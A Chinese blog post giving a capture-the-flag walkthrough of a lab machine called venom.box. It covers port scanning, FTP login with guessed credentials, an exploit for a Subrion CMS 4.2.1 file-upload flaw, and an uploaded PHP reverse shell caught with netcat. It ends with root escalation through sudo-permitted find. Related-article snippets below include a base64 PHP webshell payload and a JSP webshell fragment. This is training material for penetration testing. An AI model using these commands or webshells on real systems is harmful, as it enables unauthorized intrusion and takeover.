文件上传漏洞,find提权

于 2023-12-04 16:50:02 发布
阅读量325 收藏 2
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73452725/article/details/134785390
版权
1.目标

得到root权限,最终拿到flag。

2.信息收集

目标机和操作机ip互通

ifconfig查看本机ip地址

扫描靶机ip地址nmap 扫描出的端口和服务命令:nmap 参数 ip

发现开放端口21,22,80,443,7070,8084,

用浏览器打开80端口:IP:80

对网站进行文件扫描:dirb http://IP

打开神器F12查看源码发现MD5加密代码

猜测账户和密码都是hostinger

3.漏洞利用

连接靶机ssh没有开启直接ftp服务登录:ftp IP 发现可行得到上面的账号和密码hostinger进行登录

收集信息第一步就是查看目录

发现一个hint.txt下载到桌面,查看hint.txt文件。

发现有两个是base64加密和一个password,venom.box.

解密base64拼接语句

现将主机添加到venom.box再进行访问

登录知道账户:dora密码:

点击进去

发现cms版本号是一个熟悉的文件上传漏洞searchsploit Subrion 4.2.1

复制当前路径searchsploit -m php/webapps/49876.py

直接查看python3 49876.py -h

直接运行 python3 49876.py -u http://venom.box/panel -l 账户 -p 密码

  1. usr/share/webshells/php目录下有php-reverse-shell.php代码,将其中的IP改为自己的操作机本地IP,保存为php-reverse-shell.phar,然后上传
  2. 修改后上传打开监听端口nc -lvvp 6666
  3. 访问venom.box/uploads/php-reverse-shell.phar路径成功反弹拿到shell打一个交互shellpython -c "import pty;pty.spawn('/bin/bash')"
  4. 开始提权收集信息发现backup.bak进入发现一个txt文件查看发现一个账户和密码继续收集信息发现一个密码切换用户hostinger密码hostinger继续收集信息发现nathan用户切换用户hostinger发现有一个.bash_history
  5. 发现了查新suid程序的命令:find / -perm -u=s -type f 2>/dev/null运行后无果。切换用户nathan发现.bash_history运行命令sudo -l提权发现可以接着输入find /bin/bash -exec whoami \;发现有回显接着输入find . -exec /bin/bash -p \; -quit提权成功
江汕仕
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞
qq_66597767的博客
04-24 2291
目录 文件上传漏洞原理 产生文件上传漏洞的原因 文件上传漏洞可被利用的必要条件 常见的防御方式 绕过方式 1)客户端Javascript检测 2)服务器MIME类型检测 3)后端黑名单绕过 1.本例来源upload-labs中pass-03 2.本例来源upload-labs中pass-04 3)利用后缀名大小写进行绕过 4)后缀名加空格来绕过 5)后缀名加点绕过 6)后缀名中加“::$DATA”绕过 7)利用双写后缀绕过 ​ 4)后端白名单检测绕过 5)服务...
DVWA—文件上传漏洞(File Upload)
qq_54537919的博客
06-27 604
DVWA—文件上传漏洞(File Upload)
Web安全 SQL注入 || 文件上传漏洞.(拿到服务器的最高权限.)
网络安全领域___专研者.
02-07 5249
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台的账号和密码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器的权限.(5)文件上传技巧和绕过一些比较简单的限制.(6)随意下载和上传服务器的文件.(7)远程连接控制服务器.
太厉害了,终于有人能把文件上传漏洞讲的明明白白了
热门推荐
在下小黄的博客
05-23 4万+
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: P7 漏洞类型详解_文件上传漏洞 往期检索:小白渗透入门系列 - 目录 微信公众号回复:【文件上传】,即可获取本文全部涉及到的工具。 创建时间:2021年5月9日 软件: MindMaster Pro 漏洞类型详解_文件上传漏洞一、WebShell 与 WebShell 管理工具1.1 什么叫做WebSh
java漏洞提权_渗透提权之各种解析漏洞上传
weixin_30008295的博客
02-16 148
进后台找上传点,尝试一下jpg的图片然后,看看能不能上传,如果能上传尝试下iis解析漏洞如果不是iis,看看版本有没其他的解析漏洞或者上传漏洞查看那下编辑器版本,找编辑器漏洞。。常见解析漏洞利用方法1.asp;.jpg1.asp;.gif1.asp;1.jpg1.cer;.jpg1.asa;.jpga.aspx.a;.a.aspx.jpg..jpg自动重命名的解析漏洞如果不能用的话尝试 名小子各种...
CTF-Web(3)文件上传漏洞
最新发布
大表哥的博客
10-26 4823
一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而。
常见文件上传漏洞利用
weixin_44414845的博客
12-14 4187
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
网络攻防实战研究 漏洞利用与提权读书笔记二
一枚努力的蛋蛋
08-24 3251
网络攻防实战研究 漏洞利用与提权读书笔记二第2章 Windows漏洞利用与提权2.1 Windows提权基础2.1.1 Windows提权信息的收集2.1.2 Windows提权准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施提权2.1.5 停用安全狗2.2 提权辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
DVWA之文件上传漏洞
HoYim
03-27 787
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,...
Typesetter CMS 文件上传漏洞复现(CVE-2020-25790)
玄道的网安博客
12-19 1828
0X00简介 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 0X01影响范围 Typesetter CMS 5.x全版本,目前GitHub项目中还未修复此漏洞 0X02漏洞复现 虽然对上传的文件进行了过滤,但是没有对解压文件的文件进行过滤,导致可以上传,php的压缩文件,解压后就可以执行php文件。 Finder.class.php文件中extract函数解压后未对,解压后的文件名进行任何过滤 登录管理员账号
html input上传文件_finecms代码审计之任意文件上传漏洞
weixin_39608988的博客
11-21 442
文件上传这个功能在大部分系统中都存在,但是要做好一个文件上传和下载功能的话就非常吃经验,因为涉及到很多的边界条件。”任意文件上传背景介绍首先,文件上传首先就要校验文件类型是否在允许范围内;比如一张图片,用文本编辑器打开 在后面追加文字,此时这个文件到底判定成一张图片还是文本呢?虽此时图片仍然能打开,但假如图片里面的信息是文字比图片还多,那么到底认为这个文件是一个图片还是一个文本呢?再比...
【网络安全文件上传漏洞 详解
love_wgll的博客
02-26 1423
网络安全 top10漏洞 文件上传漏洞详解
文件上传漏洞简述
小白博客
12-22 1891
前提:一句话木马,可用php、jsp、asp等;学选择小马(什么语言环境写的马就用什么语言的马),工具菜刀、蚁剑(功能全)等 附一个jsp马 <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.l
web安全学习笔记(五) 文件上传漏洞
qycc3391的博客
02-25 1269
0.前言 我们在访问一些网站时,比如学校网站等,要求进行一些文件的上传操作,比如学校要求上传个人资料的时候,需要对图片进行上传。这些需要上传图片的地方,往往存在着文件上传漏洞。 1.一句话木马 之前的文章讲了如何搭建靶机,现在来看一下owasp的靶机。输入靶机的ip地址: 选择Damn Vulnerable Web Application, 在左侧的菜单栏选择upload。 这就是一个类似网...
代码审计typemill 任意文件上传漏洞
b1ackc4t的博客
03-19 170
漏洞描述 攻击者在后台发文章的附件处可以通过特殊的payload绕过预先设定的白名单,并且成功上传php文件 渗透过程 先把一句话木马进行base64 随便传个文件抓一下上传的包,发到repeater 构造如下payload,把一句话木马的base64放进file字段逗号后面即可 { "url":"/", "file":"xxx;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FudF0pOw==", "name":"shell.php", "csrf_name":"csrf6
【web漏洞文件上传
weixin_51614272的博客
02-16 1464
user.ini配置文件可控导致的文件上传漏洞 当前目录里面有php文件的时候,可以运用ini配置文件进行配置这个php文件 文件包含配置项有auto_append_file和auto_pretend_file auto_append_file=1.txt //保存为user.ini,记得抓包时文件名是.user.ini 1.先上传这个user.ini文件,发现上传成功。 2.然后本来不能上传规定外的文件,现在就可以上传了 3.这个1.txt里面就是一句话木马 <?php @ev
web漏洞文件上传漏洞
wutiangui的博客
06-22 2081
严重:本地文件包含不仅能够包含web文件目录中的一些配置文件(比如Web应用、数据库配置文件、config文件),还可以查看到一些Web动态页面的源代码,为攻击者进一步发掘web应用漏洞提供条件,甚至一旦与路径遍历漏洞相结合,还可能直接攫取目标系统的用户名与密码等文件。在PHP中,使用include、require、include_once、require_once函数包含的文件都被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都被当作PHP代码执行。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(四)venom1 这台靶机步骤让你充分了解反弹shell的原理及用法
hyjcking的博客
11-26 1440
这台靶机结合了很多渗透测试的知识,可以让你充分了解反弹shell的原理及用法
文件包含漏洞 基础
weixin_50464560的博客
03-21 962
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
Linux提权技术:脏牛内核漏洞与SUID实战
通过`find`命令可以找到具有SUID权限的文件,然后利用这些文件的特殊权限来执行提权脚本或命令。例如,创建一个文件并设置SUID,然后通过这个文件执行其他命令,如`whoami`或`netcat`建立远程连接。 3. **脏牛内核...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值